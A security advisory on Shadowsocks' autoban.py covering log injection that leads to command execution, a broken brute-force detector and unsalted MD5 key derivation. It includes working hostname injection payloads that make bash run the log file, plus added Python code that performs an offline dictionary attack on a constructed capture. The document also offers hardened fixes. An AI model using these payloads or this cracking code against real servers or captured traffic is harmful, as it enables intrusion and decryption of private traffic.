
Shadowsocks Log Manipulation / Command Execution

Several issues have been identified which allow attackers to manipulate log files, execute commands and brute force Shadowsocks even when the autoban.py brute force detection is enabled. The brute force detection from autoban.py does not work with the suggested tail command. The key of captured Shadowsocks traffic can be brute forced. The latest commit 2ab8c6b on Sep 6, 2017 is affected.

Summary and Impact
------------------
Several issues have been identified which allow attackers to manipulate log files, execute commands and brute force Shadowsocks even when the autoban.py brute force detection is enabled. The brute force detection from autoban.py does not work with the suggested tail command. The key of captured Shadowsocks traffic can be brute forced.

Product Description
-------------------
Shadowsocks is a fast tunnel proxy that helps you bypass firewalls.

Summary and Impact
------------------
When the brute force detection with autoban.py is enabled, remote attackers are able to execute arbitrary commands.

Command execution is possible because of line 53 of autoban.py, "os.system(cmd)", which executes "cmd = 'iptables -A INPUT -s %s -j DROP' % ip". The "ip" value is parsed from the log file, whose contents can be controlled by a third party sending unauthenticated packets: a hostname requested by a client is written to the log unescaped, and autoban.py takes the last whitespace-separated token of every line containing "can not parse header when" (cut at the first ":") as the IP address to ban, without validating it.

Proof of Concept
----------------
When a string like

  "can not parse header when ||ls&:\n"

is sent as the hostname to Shadowsocks, it ends up in the log file and leads to the execution of "ls". autoban.py does not execute commands containing spaces, because only the last whitespace-separated token of the log line is used. A requested hostname like

  " can not parse header when ||ls&:\ntouch /etc/evil.txt\nexit\ncan not parse header when ||/bin/bash</var/log/shadowsocks.log&:\n"

can be used to work around this limitation. It writes the command "touch /etc/evil.txt" into the log file on a line of its own and executes it with "/bin/bash</var/log/shadowsocks.log", which runs the whole log file as a shell script. The "exit" line is an important factor: without it, bash would reach the log line containing "/bin/bash</var/log/shadowsocks.log" again and an unbounded recursion would occur, leading to a DoS.
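The chain above, as an added, self-contained example (this is not code from shadowsocks or from the advisory): a watcher that extracts the "IP" the way the advisory describes and splices it into a shell command, next to a hardened version that validates the token as an IP address and passes it to the ban tool as an argv list. The log message layout, the threshold BAN_AFTER and the client addresses are constructed for the example; the two hostname payloads are the advisory's.

```python
"""Log injection to command execution in an autoban.py-style watcher, next to
a hardened counterpart. Added example; not code from shadowsocks or X41."""
import ipaddress

BAN_AFTER = 3  # hypothetical threshold; the real script takes it from --count


def extract_ip_vulnerable(line):
    """The extraction pattern the advisory describes: for any log line that
    contains the marker, take the last whitespace-separated token and cut it
    at the first ':'. Whatever the client managed to place there (a hostname
    with shell metacharacters) is returned as the "IP"."""
    if "can not parse header when" not in line:
        return None
    return line.split()[-1].split(":")[0]


def ban_command_vulnerable(ip):
    """The command string the watcher hands to os.system(): attacker-controlled
    text is spliced into a shell command line."""
    return "iptables -A INPUT -s %s -j DROP" % ip


def extract_ip_hardened(line):
    """Same extraction, but the token must parse as an IP address before it
    is used anywhere else; anything else is dropped."""
    token = extract_ip_vulnerable(line)
    if token is None:
        return None
    try:
        return str(ipaddress.ip_address(token))
    except ValueError:
        return None


def ban_argv_hardened(ip):
    """argv for subprocess.run(argv) (shell=False): no shell parses the IP,
    and it has already been validated by extract_ip_hardened()."""
    return ["iptables", "-A", "INPUT", "-s", ip, "-j", "DROP"]


def logged_lines(hostname):
    """Model of a logger writing an attacker-chosen hostname unescaped: each
    embedded newline starts what a line-oriented parser later sees as a fresh
    log line. The message layout here is constructed, not shadowsocks' own."""
    return ("INFO connecting %s:443 from 198.51.100.9:40000" % hostname).splitlines()


def bans_from_log(lines, extract, threshold=BAN_AFTER):
    """Count marker hits per extracted "IP" and return those that reach the
    threshold, in order. Nothing is executed here; a caller would run
    ban_argv_hardened(ip) for each result."""
    counts = {}
    banned = []
    for line in lines:
        ip = extract(line)
        if ip is None:
            continue
        counts[ip] = counts.get(ip, 0) + 1
        if counts[ip] == threshold:
            banned.append(ip)
    return banned


# Constructed sample log: three genuine failures from one client, then the
# advisory's first payload sent as hostname three times.
PAYLOAD_LS = "can not parse header when ||ls&:\n"
PAYLOAD_BASH = (" can not parse header when ||ls&:\ntouch /etc/evil.txt\nexit\n"
                "can not parse header when ||/bin/bash</var/log/shadowsocks.log&:\n")
GENUINE = "WARNING can not parse header when handling connection from 203.0.113.7:51234"
SAMPLE_LOG = [GENUINE] * 3 + logged_lines(PAYLOAD_LS) * 3


if __name__ == "__main__":
    for ip in bans_from_log(SAMPLE_LOG, extract_ip_vulnerable):
        print("vulnerable watcher would run:", ban_command_vulnerable(ip))
    for ip in bans_from_log(SAMPLE_LOG, extract_ip_hardened):
        print("hardened watcher would run:", ban_argv_hardened(ip))
```

Run stand-alone, the vulnerable path produces "iptables -A INPUT -s ||ls& -j DROP" for the injected token, while the hardened path only ever bans 203.0.113.7. Validating the token is necessary but the cheaper fix is upstream: a logger that escapes or rejects newlines in client-supplied strings removes the injection point for every consumer of the file, not just this watcher.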

Summary and Impact
------------------
The brute force detection autoban.py does not work at all with the tail command suggested at https://github.com/shadowsocks/shadowsocks/wiki/Ban-Brute-Force-Crackers.

The command "python autoban.py < /var/log/shadowsocks.log" does work, but the suggested "nohup tail -F /var/log/shadowsocks.log | python autoban.py > log 2>log &" does not block any IPs. The loop "for line in sys.stdin:" in autoban.py iterates over a Python 2 file object, which reads ahead from the pipe in large blocks and only yields lines once such a block is full or an end of file (EOF) is reached. As "tail -F" never closes the pipe, no EOF arrives, and the few lines a log produces stay in the read-ahead buffer, so sys.stdin blocks the script indefinitely. "tail -F /var/log/shadowsocks.log | python autoban.py" therefore never blocks anything except itself. A loop of the form "for line in iter(sys.stdin.readline, ''):" processes each line as soon as it arrives.
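A check for exactly this failure mode, added here and not part of the advisory or of shadowsocks: the harness feeds one log line to a stdin-driven watcher over a pipe, deliberately keeps the pipe open (as tail -F would) and waits for the watcher to react. The child script STREAMING_WATCHER is a hypothetical stand-in for autoban.py's read loop using iter(sys.stdin.readline, ''); ORIGINAL_LOOP_WATCHER uses the original "for line in sys.stdin:" form. Under Python 2 the original loop times out in this check while the streaming loop passes; Python 3's io layer reads from a pipe without the same blocking read-ahead, so both pass there. SAMPLE_LINE is constructed.

```python
"""Verify that a stdin-driven log watcher reacts to a streamed line before
EOF, which is what a "tail -F | watcher" pipeline requires. Added harness;
not shadowsocks code."""
import subprocess
import sys
import threading

# Hypothetical stand-in for autoban.py's loop, fixed to read line by line.
STREAMING_WATCHER = r"""
import sys
for line in iter(sys.stdin.readline, ''):
    if 'can not parse header when' in line:
        sys.stdout.write('WOULD-BAN ' + line.split()[-1].split(':')[0] + '\n')
        sys.stdout.flush()
"""

# The original loop shape. Under Python 2 this fills an 8 KiB read-ahead
# buffer before yielding anything, so a pipe held open by tail -F starves it.
ORIGINAL_LOOP_WATCHER = STREAMING_WATCHER.replace(
    "for line in iter(sys.stdin.readline, ''):", "for line in sys.stdin:")

# Constructed log line in the shape the watcher matches on.
SAMPLE_LINE = ("WARNING can not parse header when handling connection "
               "from 203.0.113.7:51234\n")


def responds_before_eof(watcher_source, line, timeout=5.0):
    """Start the watcher, write one line into its stdin, keep stdin open and
    wait up to `timeout` seconds for a reaction on stdout. Returns the
    watcher's first output line, or None if it never reacted in time."""
    proc = subprocess.Popen([sys.executable, "-c", watcher_source],
                            stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                            universal_newlines=True)
    reply = []
    reader = threading.Thread(target=lambda: reply.append(proc.stdout.readline()),
                              daemon=True)
    reader.start()
    try:
        proc.stdin.write(line)
        proc.stdin.flush()      # no close(): no EOF, exactly like tail -F
        reader.join(timeout)
    finally:
        proc.kill()
        proc.wait()
        proc.stdin.close()
    return reply[0].rstrip("\n") if reply and reply[0] else None


if __name__ == "__main__":
    for name, src in (("streaming", STREAMING_WATCHER),
                      ("original", ORIGINAL_LOOP_WATCHER)):
        print(name, "->", responds_before_eof(src, SAMPLE_LINE))
```

The same harness is a reasonable acceptance test for any detector that is wired to a log stream: if it only produces a ban after the pipe is closed, it is not a brute-force detector, it is a post-mortem script.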

Summary and Impact
------------------
Shadowsocks derives the encryption key from the password with an MD5-based key schedule (OpenSSL's EVP_BytesToKey), i.e. a plain hash without salt or work factor. MD5 should not be used to generate keys, since it is a hash function. A proper key derivation function increases the cost of this operation, which is a small burden for a user, who performs it once, but a big one for an attacker, who performs it once per guess. As passwords usually have low entropy, a good password-based key derivation function has to be slow.

Workarounds
-----------
Use a secure password generated by a cryptographically secure random generator. Wait for a patch that uses a password-based key derivation function like "Argon2" instead of a hash.
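The attack the two sections above describe, as an added end-to-end example (not code from shadowsocks or from the advisory): evp_bytes_to_key() is the MD5 key schedule as OpenSSL defines it, rc4_md5_crypt() is the rc4-md5 cipher construction (RC4 keyed with MD5(key || IV)) that Shadowsocks offered, and build_capture() constructs what the first bytes of a client connection would look like. brute_force() then does what an attacker with that capture can do: one MD5 per guessed password, checking each guess by whether the decrypted bytes parse as a request header followed by a TLS record. derive_key_slow() shows the cost difference with a stdlib KDF (PBKDF2 here, because Argon2, which the advisory recommends, is not in the standard library). The password "hunter2", the IV, the wordlist and the target address are constructed sample data.

```python
"""Why an unsalted MD5 key schedule makes captured Shadowsocks traffic
brute-forceable. Added, self-contained demonstration; not shadowsocks code."""
import hashlib
import string


def evp_bytes_to_key(password, key_len, iv_len):
    """OpenSSL EVP_BytesToKey with MD5 and no salt: m[0] = MD5(pw),
    m[i] = MD5(m[i-1] || pw), concatenated until key_len + iv_len bytes
    exist. One MD5 call per 16 bytes of output, no work factor."""
    blocks = []
    while sum(len(b) for b in blocks) < key_len + iv_len:
        prev = blocks[-1] if blocks else b""
        blocks.append(hashlib.md5(prev + password).digest())
    material = b"".join(blocks)
    return material[:key_len], material[key_len:key_len + iv_len]


def rc4(key, data):
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same XOR."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4_md5_crypt(key, iv, data):
    """The rc4-md5 method: RC4 keyed with MD5(key || iv), 16-byte key and IV."""
    return rc4(hashlib.md5(key + iv).digest(), data)


HOSTNAME_CHARS = set((string.ascii_letters + string.digits + ".-").encode())


def parse_header(plaintext):
    """Attacker's oracle: do these bytes look like a request header (atyp 3 =
    hostname, length, name, port) followed by a TLS handshake record? A wrong
    key yields pseudo-random bytes that fail. Returns (host, port) or None."""
    if len(plaintext) < 2 or plaintext[0] != 3:
        return None
    n = plaintext[1]
    host, rest = plaintext[2:2 + n], plaintext[2 + n:]
    if n == 0 or len(host) != n or not set(host) <= HOSTNAME_CHARS:
        return None
    if len(rest) < 5 or rest[2:5] != b"\x16\x03\x01":
        return None
    return host.decode(), int.from_bytes(rest[:2], "big")


def build_capture(password, iv, host, port):
    """Constructed 'capture': IV || RC4_MD5(key, IV, header || payload), the
    shape of a client's first bytes for rc4-md5 (sample data, not a capture)."""
    key, _ = evp_bytes_to_key(password.encode(), 16, 16)
    header = bytes([3, len(host)]) + host.encode() + port.to_bytes(2, "big")
    payload = b"\x16\x03\x01\x00\x05hello"  # start of a TLS handshake record
    return iv + rc4_md5_crypt(key, iv, header + payload)


def brute_force(capture, wordlist):
    """Offline dictionary attack: one MD5 per candidate, then a trial
    decryption of the first bytes. Returns (password, host, port) or None."""
    iv, body = capture[:16], capture[16:]
    for candidate in wordlist:
        key, _ = evp_bytes_to_key(candidate.encode(), 16, 16)
        found = parse_header(rc4_md5_crypt(key, iv, body))
        if found:
            return candidate, found[0], found[1]
    return None


def derive_key_slow(password, salt):
    """What the advisory asks for: a password-based KDF with a work factor.
    PBKDF2 (stdlib) with 200k iterations; Argon2 needs a third-party package."""
    return hashlib.pbkdf2_hmac("sha256", password, salt, 200_000, dklen=16)


# Constructed sample data
SAMPLE_IV = bytes(range(16))
SAMPLE_CAPTURE = build_capture("hunter2", SAMPLE_IV, "example.com", 443)
WORDLIST = ["123456", "password", "shadowsocks", "hunter2", "letmein"]

if __name__ == "__main__":
    print(brute_force(SAMPLE_CAPTURE, WORDLIST))
```

Each candidate costs one MD5 and one RC4 key setup, so a CPU tries millions of passwords per second against a single captured connection, and the IV does not help because the password-to-key step is unsalted: one wordlist run serves every server using that password. Replacing evp_bytes_to_key() with derive_key_slow() (or Argon2) leaves the attack structurally identical but makes every guess cost hundreds of thousands of HMAC operations.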

About X41 D-Sec GmbH
--------------------
X41 D-Sec is a provider of application security services. We focus on application code reviews, design review and security testing. X41 D-Sec GmbH was founded in 2015 by Markus Vervier. We support customers in various industries such as finance, software development and public institutions.

Timeline
--------
2017-09-28 Issues found
2017-10-05 Vendor contacted
2017-10-09 Vendor contacted, replied to use GitHub for a full disclosure
2017-10-11 Vendor contacted, asked if the vendor is sure to want a full disclosure
2017-10-12 Vendor contacted, replied to create a public issue on GitHub
2017-10-13 Created public issues on GitHub
2017-10-13 Advisory release